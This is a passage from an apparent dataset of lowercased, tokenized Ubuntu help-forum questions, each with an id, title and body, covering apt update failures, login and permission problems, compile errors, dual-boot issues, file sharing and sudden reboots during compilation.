of data . 64 bytes from ragana.canonical.com ( 91.189.91.13 ) : icmp_req=1 ttl=49 time=42.0 ms 64 bytes from ragana.canonical.com ( 91.189.91.13 ) : icmp_req=2 ttl=49 time=43.3 ms -- - ca.archive.ubuntu.com ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1001ms rtt min/avg/max/mdev = 42.088/42.742/43.396/0.654 ms davidrockin @ ubuntu : /etc/apt $ ping -c 2 91.189.92.202 ping 91.189.92.202 ( 91.189.92.202 ) 56 ( 84 ) bytes of data . 64 bytes from 91.189.92.202 : icmp_req=1 ttl=49 time=101 ms p64 bytes from 91.189.92.202 : icmp_req=2 ttl=49 time=98.9 ms -- - 91.189.92.202 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1002ms rtt min/avg/max/mdev = 98.976/100.335/101.695/1.395 ms davidrockin @ ubuntu : /etc/apt $ ping -c 3 security.ubuntu.com ping security.ubuntu.com ( 91.189.91.14 ) 56 ( 84 ) bytes of data . 64 bytes from orobas.canonical.com ( 91.189.91.14 ) : icmp_req=1 ttl=52 time=112 ms 64 bytes from orobas.canonical.com ( 91.189.91.14 ) : icmp_req=2 ttl=52 time=44.5 ms ^c64 bytes from orobas.canonical.com ( 91.189.91.14 ) : icmp_req=3 ttl=52 time=41.0 ms -- - security.ubuntu.com ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2003ms rtt min/avg/max/mdev = 41.038/66.103/112.679/32.967 ms i have tried modifying my /etc/apt/sources.list file to use a different respository this is my current /etc/apt/sources.list file , which is the original file that was created when ubuntu installed . deb http : //ca.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //ca.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //ca.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //ca.archive.ubuntu.com/ubuntu/ raring universe deb http : //ca.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //ca.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //ca.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //ca.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //ca.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //ca.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse i have tried restarting my computer , reinstalling my virtual machine , restarting my router many times , modifying the sources.list , and i have been googling for several hours , and ca n't figure out why it 's not working . i have also attempted to disable ipv6 ( http : //www.bearfruit.org/2013/05/06/ubuntu-server-having-ipv6-probs-its-easy-to-disable/ ) last night i had setup an ubuntu server to test it out , and apt-get update worked last night . now , it 's not working anymore on a new virtual machine . the one i created yesterday was deleted , and the new one i created today is not working . my host machine is a laptop and i am using wifi , the specs of it is windows 7 8gb ram 658 gb hdd ( 214 gb used ) amd a8-3520m apu edit : i am not behind a proxy/vpn , and my internet connection is fine .
336875	i can only login as guest	i did a password change . it was n't memorable enough . i reset my password using a series of commands from the root shell in recovery mode : # mount -rw -o remount / # passwd { username } enter new password : successfully changed . # exit restart computer . i then entered my password and it acted like it was going to log on but brought me back to the login page . i used ctrl + alt + f1 and logged in successfully . dir and ls yield two files : readme.txt , and something along the lines of desktop-private-files-and-folders.dir . i can not cd to any directory . i tried to use the live cd but in the test profile when i try to access the information on my mounted hard drive it tells me that i do not have permission to access . neither can i copy that information . i have tried to be as thorough and detailed as possible without adding any fluff .
336876	where do i download the ubuntu touch rom ?	i have the nexus 4 where do i download the ubuntu touch rom because i cant find it on your site anywhere
336878	how to compile indicator terminal ? fails with `` a required package was not found '' message	i 'm trying to compile this package from launchpad : https : //code.launchpad.net/~tombeckmann/+junk/indicator-terminal i installed valac , as the package has some vala code . and cmake , as there 's a cmakelist.txt i downloaded the code the code with bzr , and tried to compile with cmake : biel @ c3po : ~ $ bzr branch lp : ~tombeckmann/+junk/indicator-terminal you have not informed bzr of your launchpad id , and you must do this to write to launchpad or access private data . see `` bzr help launchpad-login '' . branched 1 revision . biel @ c3po : ~ $ cd indicator-terminal biel @ c3po : ~/indicator-terminal $ cmake cmakelists.txt -- the c compiler identification is gnu -- the cxx compiler identification is gnu -- check for working c compiler : /usr/bin/gcc -- check for working c compiler : /usr/bin/gcc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - done -- checking for modules 'granite ; indicator3-0.4 ; keybinder-3.0 ; vte-2.90' -- package 'granite ' not found -- package 'indicator3-0.4 ' not found -- package 'keybinder-3.0 ' not found -- package 'vte-2.90 ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:266 ( message ) : a required package was not found call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpkgconfig.cmake:320 ( _pkg_check_modules_internal ) cmakelists.txt:39 ( pkg_check_modules ) -- found vala : /usr/bin/valac -- checking for a minimum vala version of 0.16.1 -- found vala , version 0.20.1 cmake error at cmakelists.txt:76 ( install ) : install targets given no library destination for shared library target `` indicator-terminal '' . -- configuring incomplete , errors occurred ! i 'm using ubuntu 12.04 .
336883	multiple item name copying	so i 've got a folder with 2n files . n them are .foo files , n of them .bar files . i want to copy the filenames of the .foo files ( which are all different ) to the .bar files ordered alphabetically . the extension must remain as they are .
336886	mongodb super-admin authenticates fine but still gets unauthorized query errors ?	i have started using mongodb with authentication . as per the documentation i used the localhost exception to create an admin user with the single role of useradminanydatabase . that all went fine . when i run the `` mongo '' client and authorize against the admin database after using that database i get the number 1 indicating that authorization succeeded . however , any command i try to execute results in an `` unauthorized '' error , even trying to show the collections in the admin database i just authorized against . can anyone tell me why this is and how i can fix it ? currently i am running without authentication until i can get this fixed .
336892	how well is amd 's family of apus supported under ubuntu ?	can anyone provide current information on whether or not it is possible to get these a-series apus fully functioning with the latest release of ubuntu ( 13.04 ) ? by `` fully functioning '' i mean seeing the exact same cpu features and performance levels , from a hardware standpoint rather than a software standpoint , as , say , the windows 8 os does . in other words , will i be better off buying the windows os if i want to fully use one of these apus ? i noticed that many people have been able to install amd-provided drivers with jockey . will these drivers enable users to take advantage of all functions of the cpu and yield the maximum possible performance ?
336893	gnome 3 connection problem	i am new in linux universe , i 'm using the 12.04 version of the ubuntu , and i 've installed gnome using the apt-get , i was getting some connections problems , i 'm not sure if it was after that , but , yesterday i 've used apt-get update and apt-get upgrade and i 'm receiving many messages of error . there is a solution ? what could it be ?
336895	how to add an image to ubuntu server 12.04 lts ?	with ubuntu server being a completely text only os , how do you add an image file ? i have a webpage set up and would like to add an image or two . open ssh is running on the server and connected to my laptop running windows 7 ( over putty ) . is there a way to somehow `` drag-and-drop '' an image file to the server from my laptop over open ssh ? thanks in advance , chandler yes , i may be a n00b but i am 13 , and completely new to linux and html in general . : )
336896	usb - unetbootin not showing ?	i am currently using ubuntu , and trying to dual boot with backtrack 5 . i have the iso and everything but when i start unetbootin there is no usb showing up . it shows in the sidebar of ubuntu that my usb is there with the icon and i can store files on it like normally , but unetbootin does n't recognize it . i manually mounted it to media/drive and i formatted it to fat32 using disk utility but still is n't showing . it used to show up under /dev/sdb1 but it kept pausing at 39 % . people online said to format it to fat32 so i did , and now it 's gone . edit : i formatted it back to normal using persistence . now it still gets stuck at 39 % . any ideas ?
336900	can not run sudo update-manager	i can not run sudo update-manager . i dont know whats wrong . do you know ? ( precise ) acer @ localhost : ~ $ sudo update-manager [ sudo ] password for acer : ( process:5761 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . warning : root : estimate_kernel_size_in_boot ( ) returned '0 ' ? traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 64 , in < module > help=_ ( `` directory that contains the data files '' ) .decode ( enc ) ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc3 in position 17 : ordinal not in range ( 128 ) ( precise ) acer @ localhost : ~ $ ( precise ) acer @ localhost : ~ $ sudo dpkg-reconfigure locales perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` sv_sv : en '' , lc_all = ( unset ) , lc_messages = `` sv_sv.utf-8 '' , lang = `` sv_sv.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory generating locales ... en_ag.utf-8 ... up-to-date en_au.utf-8 ... up-to-date en_bw.utf-8 ... up-to-date en_ca.utf-8 ... up-to-date en_dk.utf-8 ... up-to-date en_gb.utf-8 ... up-to-date en_hk.utf-8 ... up-to-date en_ie.utf-8 ... up-to-date en_in.utf-8 ... up-to-date en_ng.utf-8 ... up-to-date en_nz.utf-8 ... up-to-date en_ph.utf-8 ... up-to-date en_sg.utf-8 ... up-to-date en_us.utf-8 ... up-to-date en_za.utf-8 ... up-to-date en_zm.utf-8 ... up-to-date en_zw.utf-8 ... up-to-date sv_fi.utf-8 ... up-to-date sv_se.utf-8 ... up-to-date generation complete . ( precise ) acer @ localhost : ~ $ i use swedish language , but not swedish keyboard layout beacuse i dont know how to install that .
336907	really verbose way to test git connection over ssh ?	when using git , i have problems with using git over ssh , and since it works just fine both from work , and at home with a different modem , it 's obviously my home modem that is acting up . i have no problems connecting over http . so , i 'm assuming it is an ssh problem , but i 'm no expert at using it directly . is there any command i can run which sets up a `` test '' connection , and lets me know exactly when and where along the line the problem occurs ? pretty much all `` larger '' commands ( such as fetch , clone , or push with much data ) from git ( even when run with -v ) just `` hang '' in the middle of connecting remotely with no indication as to why they have stopped , so they are of no use . is there any way i can get more details on what is happening in the ssh connection ?
336908	pdf security problem	i 'm looking for a program that allows me to export a document to pdf safely , so that other users can open it but can not copy or print its contents . while i used windows i used pdf printers such as pdf24 and bullzip , which allowed me to create documents with these characteristics . but when i opened these documents from my ubuntu with okular or document viewer , all safety features disappeared . so , i could copy and print documents protected by windows on ubuntu . my question then is : how i can protect pdfs on all platforms ? i 'm looking for something easy to use because it will be used by people who have no extensive knowledge in computers . thanks a lot .
336910	how to save changes and installed packages so i can install them in other systems	i want to format my system , but i donât want to lose my updates and installed packages . i also want the same packages on other systems as well .
336920	how to open terminal in dolphin ?	in ubuntu 13.04 with kde desktop is there any way to do action like `` open terminal `` option or any hot key is available ? thank you .
336922	dual-boot ( win7/13.04 ) wo n't boot to windows ( no grub menu ) . boot-repair did n't fix it	i installed ubuntu using this tutorial : http : //www.youtube.com/watch ? v=xk8x7_tywma but it does n't show the grub menu when i startup , it only boots into ubuntu . i can look in my hard drive via the file manager and clearly see windows is still installed , so i did n't accidently install ubuntu over it or anything . i read on many forums that installing and running boot-repair from the live-cd would solve the problem , but it did n't . i ran it twice , so i have two urls : paste.ubuntu.com/6023342 paste.ubuntu.com/6023353 can anyone help me ? i 'm desperate to be able to log back into windows . i 've seen a few threads saying that their install will only boot into windows , but no one with my problem of only booting into ubuntu .
336931	having issue with creating a script	trying to create a simple script but i 'm not having any luck . i created a file with nano , saved it . then : sudo chmod +x filename the script is : # ! /bin/bash # script to restart networking after failed suspend sudo service network-manager stop sudo rm /var/lib/networkmanager/networkmanager.state sudo service network-manager start but when i test it , it says : command not found .
336932	black screen on 12.04 startup	whenever i boot up ubuntu , it shows the purple screen , then cuts to black . before this happened , i was editing the xsession file , by adding a few more lines that started up dwm and added something to it 's taskbar . i also added a custom.desktop file in the xsessions folder , that launched the .xsession file . is there any way to fix what happened ? or at least a way i can edit the xsessions file ?
336938	mts mblaze is not working on ubuntu 13.04 64 bit	my mts mblaze is not connecting in ubuntu 64 bit 13.04 . i tried to install crossplatformui v2 1.2 sstl all ubuntu deb , but thisdoes not exists in rapidshare link . i downloaded one from 4shared.com , but that is not getting installed . can anyone help in this ? i 'm fairly new to ubuntu .
336940	how do i install libglade2-0 ?	i 'm trying to install a canon mf4450 printer from a network to ubuntu . i have a driver file from canon 's website linux_ufrii_printerdriver_v270_us_en.tar.gz . two *.deb files are contained in the original file . the printer installer is asking me for a ppd file format to be chosen in driver file selection . i 'm using this command : /folder $ sudo dpkg -i file_name.deb ... in the terminal and it has a dependency problem on libglade2-0 - this package is not installed . how can i install this package ?
336943	how do i adjust the contrast .	does anyone know how to adjust the contrast on the ubuntu operating system ? i have an hp pavilion g6 laptop , any help would be great !
336951	applications folder	i moved my applications folder into the home folder without thinking and now i am unable to move them back into the usr folder . i want to move the applications folder back to where it was . how would i do this ?
336954	gimp ( gap ) on ubuntu 10.04	there 's a picture of what comes up . this comes up every time i try to extract videorange . i 've tried .mp4 , .mpg , and .flv files and it says the same thing each time . i looked it up on youtube , and .mp4 worked for someone else . i 'm pretty sure that the problem must be beyond that but i do n't know what it is .
336958	remove grub loader from mac - usb thumbdrive installation	i installed linux from one bootable usb thumbdrive onto another bootable thumbdrive . that works . however , now my macbook air boots to `` error : no such device : xxxxxxx ... grub rescue > '' . if i hold the option key , i can boot to osx . i have a carboncloner backup of my osx build ( created after the grub error ) and i can boot from it . is there a simple way to remove grub and return my mac to just running osx as intended ? i only want to run linux from the thumbdrive . many thanks from a newbie .
336959	having trouble installing ubuntu 13.04 on windows 8 machine ( hp envy 17t j000 )	i am having trouble installing ubuntu 13.04 on my laptop . i have tried burning the .iso file to a blank dvd and have also used universal usb installer for the usb stick option of installation described on the ubuntu website . the problem i am having is that no matter what changes i make to my bios settings ( boot order , secure boot , legacy boot , etc . ) i ca n't seem to get my machine to recognize that i want to run the ubuntu installation through the live dvd or the usb . i first tried the dvd approach and could n't get my machine to recognize there was an installation of ubuntu available . therefore , i went out to by a usb stick and try this approach ( this is what is exemplified in many youtube video tutorials on this subject ) . i followed the instructions that included directions involving the universal usb installer mentioned above and i finally got the machine to recognize booting from the usb stick was an option , but i get a message along the lines of `` the image file was unable to be authenticated '' and it just boots windows . i would really like to be able to dual boot windows and linux to enjoy windows as i have thus far , but learn an operating system that is easier to deal with in the web-development realm at the same time . would someone be able to help me get ubuntu installed on my machine so that when i plan on working on my sites , i can boot up ubuntu , but when i wan na use my computer for anything else , i can boot windows ? please understand that i anticipate comments that will suggest i just do away with windows . thanks for the advice ahead of time . i 'd rather not . anyone out there that can help me ? update : i was able to get my machine to recognize my bootable usb drive . i turned off secure boot , turned on legacy boot , then i reformatted my usb drive through windows rather than through universal usb installer , then downloaded a new version of the iso image file , and used universal usb installer to , again , reformat the usb drive and mount the iso to the usb drive . then i restarted my computer and , after figuring out that a black screen was actually just the ubuntu installation screen on a really low brightness setting , installed ubuntu . i ran easybcd and ireboot , and now i have successfully got the windows boot manager asking me if i want to boot windows 8 or ubuntu 13.04 . however , when i select to boot ubuntu 13.04 , i get an error message saying that windows did n't boot properly . i am very confused by this . if i select windows , it boot windows just fine . but somehow selecting ubuntu makes it think i 'm still trying to boot windows and it errors out . anybody have any clue what is going on here ? another update : having professionals try to install ubuntu as an operating system i can dual boot with windows 8 seemed to expose an issue with the hardware that had apparently been there in the first place . the motherboard was replaced , and after getting the pc back that i purchased a very long time ago , i have decided to try using virtualbox ubuntu vms to do what i can . this is not my preference , but i have grown tired of trying to get this to work . maybe some day i will be willing to just have ubuntu . but right now , i want both and this is the only way i can get it to work .
336967	ubuntu launcher not displayed in vmware	i have installed vmware player in my laptop with windows 7 as the host os and ubuntu 12.04 as guest os . everything went fine , but my menu pane which appears vertically on the left side of the desktop of ubuntu 12.04 is not getting displayed . i did the same installation with virtualbox , and it 's running good . should i install any additional features so that the menu gets enabled in the virtual machine ?
336971	open command works only as sudo	i am using filezilla on ubuntu which suddenly became unable to connect to a usual remote ftp server anymore . i noticed that filezilla try 's to run : open `` user @ server '' 22 so i tried executing it on a terminal : open `` user @ server '' 22 which gives : could n't get a file descriptor referring to the console however , using sudo gives : sudo open `` user @ server '' 22 seems to work ok. is there a file that open uses that its permissions needs to be changed ? ?
336975	enable file sharing amongst ubuntu , xubuntu , lubuntu ?	i will try to explain the scenario in a least complicated manner ; i have 20 computers in here , 14 – xubuntu ( pc1 , pc 2 , pc 3 , pc 4 , pc 5 , pc 6 , pc 7 , pc 8 , pc 9 , pc 10 pc,11 , pc 12 , pc13 , pc14 ) 5 – lubuntu ( pc15 , pc16 , pc17 , pc18 , pc19 ) 1 – ubuntu ( pc20 ) all connected to the lan ( local area network ) now , is it possible to enable pure file sharing among all of these ? every computer will have a folder named ‘shared’ on their desktop which should be able to get written and read by anyone on the lan . there should be no username and password or any kind of authentication while copying/pasting or accessing the shared folder ( i don’t care about the security ) please can someone help me in a way to set this thing up ? and please consider that i can’t afford any fancy surprises because the end users ( operators ) are used to winxp file sharing . until now i’ve tried using samba and sometimes it works sometimes it says permission denied , connection refused , volume not mounted . i’ve installed thunar file manager on every computer . sometimes while copying just a 2 mb file it takes ages , it keeps on saying copying….till my wit ends . and then i end up using a flash drive
336976	can not mount any file system/usb stick with nautilus side bar after changing uid of my user	there are a lot of answers in here that describe how to change a user 's uid . this is necessary to match it to my nas and to ease nfs mounts and permissions . but : i had to do this on ubuntu 13.04 and after i changed my user 's uid , i can not mount any devices anymore in nautilus side bar . in nautilus when i click on a different file system that is not mounted or insert a usb stick , i get the error message : ( in german ) '' dieser ort konnte nicht angezeigt werden '' and then ( i translate ) : '' you do n't have the required permissions to see the contents of ad390f97 ... ... ... . '' this is a direct implication i got right after changing the uid and rebooting . so there must be something wrong in nautilus that does not like changing of uids ! what is that ? i need to get this fixed !
336983	removed zeitgeist , ubuntu 12.04 starts in terminal	i did the mistake to remove zeitgeist , which uninstalled many important packages . i use unity and first it just did n't let me login . later i removed some more packages like python-nautilus , while i was autoremoving stuff , hoping that dependancies will be fixed . now when i start ubuntu it loads up something similar to terminal , but i can not write anything . i can not start recovery mode any more ( does n't load ) , but even if i do so it does n't have internet connection , because i use static ip in the network and router . i can only start live cd of ubuntu 12.04 . i tried to chroot and get back everything i need . but i get the error `` unable to resolve host ubuntu '' . when i mount the file system it actually changes hostname to another one , so probably there is the problem . but then how can i install back all these packages ? pls , help ! p.s . i can try to use this answer - after remove zeitgeist , there is no unity in ubuntu , but i do n't know how to deal with the above situation - unable to resolve hostname . and after applying more changes , maybe it wo n't be enough any more .
336984	how to find root cause which results in my ubuntu 12.04 suddenly reboot frequently while i using make to compile ?	when i was using make to compile my source code , the ubuntu reboot suddenly , after reboot and re-compile for a while , the ubuntu reboot again , this problem frequently occurred these two days , and i had to break the compiling , the lasted one occurred this morning and today i have no more compiling . how to find root cause to resolve this fatal issue ? or from where can i start to diagnose ? yesterday i suspected the memory had run out , and the top before reboot , top - 20:20:28 up 30 min , 3 users , load average : 1.63 , 1.18 , 0.86 tasks : 176 total , 1 running , 174 sleeping , 0 stopped , 1 zombie cpu ( s ) : 55.6 % us , 1.6 % sy , 0.0 % ni , 42.0 % id , 0.2 % wa , 0.0 % hi , 0.6 % si , 0.0 % st mem : 1974116k total , 1766708k used , 207408k free , 18812k buffers swap : 1998844k total , 31496k used , 1967348k free , 697752k cached pid user pr ni virt res shr s % cpu % mem time+ command 17811 victor 20 0 1557m 82m 9692 s 263 4.3 0:08.10 javac 9 root 20 0 0 0 0 s 0 0.0 0:01.39 kworker/1:0 54 root 20 0 0 0 0 s 0 0.0 0:01.32 kworker/3:1 1115 root 20 0 154m 36m 8120 s 0 1.9 0:36.17 xorg 1938 victor 20 0 1128m 70m 32m s 0 3.6 0:15.63 compiz 1947 victor 20 0 20180 932 760 s 0 0.0 0:00.80 syndaemon 2097 victor 20 0 513m 18m 10m s 0 0.9 0:21.30 gnome-terminal 1 root 20 0 24560 1836 1372 s 0 0.1 0:00.63 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:02.61 ksoftirqd/0 6 root rt 0 0 0 0 s 0 0.0 0:00.02 migration/0 7 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/0 8 root rt 0 0 0 0 s 0 0.0 0:00.02 migration/1 10 root 20 0 0 0 0 s 0 0.0 0:01.79 ksoftirqd/1 11 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/1 12 root rt 0 0 0 0 s 0 0.0 0:00.32 migration/2 14 root 20 0 0 0 0 s 0 0.0 0:01.56 ksoftirqd/2 15 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/2 16 root rt 0 0 0 0 s 0 0.0 0:00.25 migration/3 18 root 20 0 0 0 0 s 0 0.0 0:01.56 ksoftirqd/3 19 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/3 20 root 0 -20 0 0 0 s 0 0.0 0:00.00 cpuset 21 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper 22 root 20 0 0 0 0 s 0 0.0 0:00.00 kdevtmpfs 23 root 0 -20 0 0 0 s 0 0.0 0:00.00 netns 25 root 20 0 0 0 0 s 0 0.0 0:00.00 sync_supers 26 root 20 0 0 0 0 s 0 0.0 0:00.00 bdi-default 27 root 0 -20 0 0 0 s 0 0.0 0:00.00 kintegrityd 28 root 0 -20 0 0 0 s 0 0.0 0:00.00 kblockd 30 root 0 -20 0 0 0 s 0 0.0 0:00.00 ata_sff 31 root 20 0 0 0 0 s 0 0.0 0:00.00 khubd 32 root 0 -20 0 0 0 s 0 0.0 0:00.00 md it seems has no problem about memory and cpu schedule . it seems the cpu temperature was not the root cause , the cpu temperature was not too high before rebooting . sat aug 31 17:08:41 cst 2013 acpitz-virtual-0 adapter : virtual device temp1 : +83.0°c ( crit = +90.0°c ) thinkpad-isa-0000 adapter : isa adapter fan1 : 514 rpm temp1 : +77.0°c temp2 : +83.0°c temp3 : +77.0°c temp4 : +0.0°c temp5 : +0.0°c temp6 : +0.0°c temp7 : +33.0°c temp8 : +0.0°c temp9 : +77.0°c temp10 : +66.0°c temp11 : -4.0°c temp12 : +77.0°c temp13 : +77.0°c temp14 : +0.0°c temp15 : +0.0°c temp16 : +0.0°c coretemp-isa-0000 adapter : isa adapter core 0 : +78.0°c ( high = +80.0°c , crit = +90.0°c ) core 2 : +77.0°c ( high = +80.0°c , crit = +90.0°c ) these logs , /var/log/syslog aug 31 10:12:47 thinkpad-edge rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 853 '' x-info= '' http : //www.rsyslog.com '' ] rsyslogd was huped aug 31 10:14:04 thinkpad-edge anacron [ 2608 ] : job `cron.daily ' terminated aug 31 10:14:06 thinkpad-edge aptdaemon : info : quitting due to inactivity aug 31 10:14:06 thinkpad-edge aptdaemon : info : quitting was requested aug 31 10:17:01 thinkpad-edge cron [ 3608 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) aug 31 10:17:35 thinkpad-edge anacron [ 2608 ] : job `cron.weekly ' started aug 31 10:17:35 thinkpad-edge anacron [ 3780 ] : updated timestamp for job `cron.weekly ' to 2013-08-31 aug 31 10:19:19 thinkpad-edge anacron [ 2608 ] : job `cron.weekly ' terminated aug 31 10:19:19 thinkpad-edge anacron [ 2608 ] : normal exit ( 2 jobs run ) aug 31 17:05:01 thinkpad-edge dhcpd : dhcprequest for 192.168.0.3 from 88:53 : d4:26 : c4:14 ( android-613ef32c24ca718e ) via wlan1 aug 31 17:05:01 thinkpad-edge dhcpd : dhcpack on 192.168.0.3 to 88:53 : d4:26 : c4:14 ( android-613ef32c24ca718e ) via wlan1 aug 31 17:05:01 thinkpad-edge dhcpd : dhcprequest for 192.168.0.3 from 88:53 : d4:26 : c4:14 ( android-613ef32c24ca718e ) via wlan1 aug 31 17:05:01 thinkpad-edge dhcpd : dhcpack on 192.168.0.3 to 88:53 : d4:26 : c4:14 ( android-613ef32c24ca718e ) via wlan1 aug 31 17:08:18 thinkpad-edge hostapd : wlan1 : sta 88:53 : d4:26 : c4:14 wpa : group key handshake completed ( rsn ) aug 31 17:08:18 thinkpad-edge hostapd : wlan1 : sta 88:53 : d4:26 : c4:14 wpa : received eapol-key 2/2 group with unexpected replay counter aug 31 17:09:47 thinkpad-edge kernel : imklog 5.8.6 , log source = /proc/kmsg started . aug 31 17:09:47 thinkpad-edge rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 799 '' x-info= '' http : //www.rsyslog.com '' ] start aug 31 17:09:47 thinkpad-edge rsyslogd : rsyslogd 's groupid changed to 103 aug 31 17:09:47 thinkpad-edge rsyslogd : rsyslogd 's userid changed to 101 aug 31 17:09:47 thinkpad-edge rsyslogd-2039 : could not open output pipe '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ] aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] initializing cgroup subsys cpuset aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] initializing cgroup subsys cpu aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] linux version 3.5.0-39-generic ( buildd @ roseapple ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 60~precise1-ubuntu smp wed aug 14 15:38:41 utc 2013 ( ubuntu 3.5.0-39.60~precise1-generic 3.5.7.17 ) aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] command line : boot_image=/boot/vmlinuz-3.5.0-39-generic root=uuid=2b1c65df-1673-4613-ae42-03f9ac0df181 ro quiet splash vt.handoff=7 /var/log/xorg.0.log.old [ 1816.518 ] ( ii ) radeon ( 0 ) : edid vendor `` len '' , prod id 16544 [ 1816.518 ] ( ii ) radeon ( 0 ) : printing ddc gathered modelines : [ 1816.518 ] ( ii ) radeon ( 0 ) : modeline `` 1366x768 '' x0.0 69.30 1366 1398 1422 1470 768 771 775 785 -hsync -vsync ( 47.1 khz ep ) [ 1816.518 ] ( ii ) radeon ( 0 ) : modeline `` 1366x768 '' x0.0 57.70 1366 1398 1422 1470 768 771 775 785 -hsync -vsync ( 39.3 khz e ) [ 22674.104 ] ( ii ) config/udev : removing device mlk rapoo 7100 [ 22674.422 ] ( ii ) evdev : mlk rapoo 7100 : close [ 22674.557 ] ( ii ) unloadmodule : `` evdev '' [ 22677.184 ] ( ii ) config/udev : adding input device mlk rapoo 7100 ( /dev/input/mouse0 ) [ 22677.250 ] ( ii ) no input driver specified , ignoring this device . [ 22677.250 ] ( ii ) this device may have been added with another device file . [ 22677.250 ] ( ii ) config/udev : adding input device mlk rapoo 7100 ( /dev/input/event6 ) [ 22677.250 ] ( ** ) mlk rapoo 7100 : applying inputclass `` evdev pointer catchall '' [ 22677.250 ] ( ** ) mlk rapoo 7100 : applying inputclass `` evdev keyboard catchall '' [ 22677.250 ] ( ii ) using input driver 'evdev ' for 'mlk rapoo 7100' [ 22677.250 ] ( ** ) mlk rapoo 7100 : always reports core events [ 22677.250 ] ( ** ) evdev : mlk rapoo 7100 : device : `` /dev/input/event6 '' [ 22677.327 ] ( -- ) evdev : mlk rapoo 7100 : vendor 0x1bcf product 0x501 [ 22677.327 ] ( -- ) evdev : mlk rapoo 7100 : found 9 mouse buttons [ 22677.327 ] ( -- ) evdev : mlk rapoo 7100 : found scroll wheel ( s ) [ 22677.327 ] ( -- ) evdev : mlk rapoo 7100 : found relative axes [ 22677.327 ] ( -- ) evdev : mlk rapoo 7100 : found x and y relative axes [ 22677.327 ] ( -- ) evdev : mlk rapoo 7100 : found absolute axes [ 22677.327 ] ( ii ) evdev : mlk rapoo 7100 : forcing absolute x/y axes to exist . [ 22677.327 ] ( -- ) evdev : mlk rapoo 7100 : found keys [ 22677.327 ] ( ii ) evdev : mlk rapoo 7100 : configuring as mouse [ 22677.327 ] ( ii ) evdev : mlk rapoo 7100 : configuring as keyboard [ 22677.328 ] ( ii ) evdev : mlk rapoo 7100 : adding scrollwheel support [ 22677.328 ] ( ** ) evdev : mlk rapoo 7100 : yaxismapping : buttons 4 and 5 [ 22677.328 ] ( ** ) evdev : mlk rapoo 7100 : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 22677.328 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2.4/2-1.2.4:1.0/input/input15/event6 '' [ 22677.328 ] ( ii ) xinput : adding extended input device `` mlk rapoo 7100 '' ( type : keyboard , id 11 ) [ 22677.328 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 22677.328 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 22677.328 ] ( ** ) option `` xkb_layout '' `` us '' [ 22677.362 ] ( ii ) evdev : mlk rapoo 7100 : initialized for relative axes . [ 22677.362 ] ( ww ) evdev : mlk rapoo 7100 : ignoring absolute axes . [ 22677.362 ] ( ** ) mlk rapoo 7100 : ( accel ) keeping acceleration scheme 1 [ 22677.362 ] ( ** ) mlk rapoo 7100 : ( 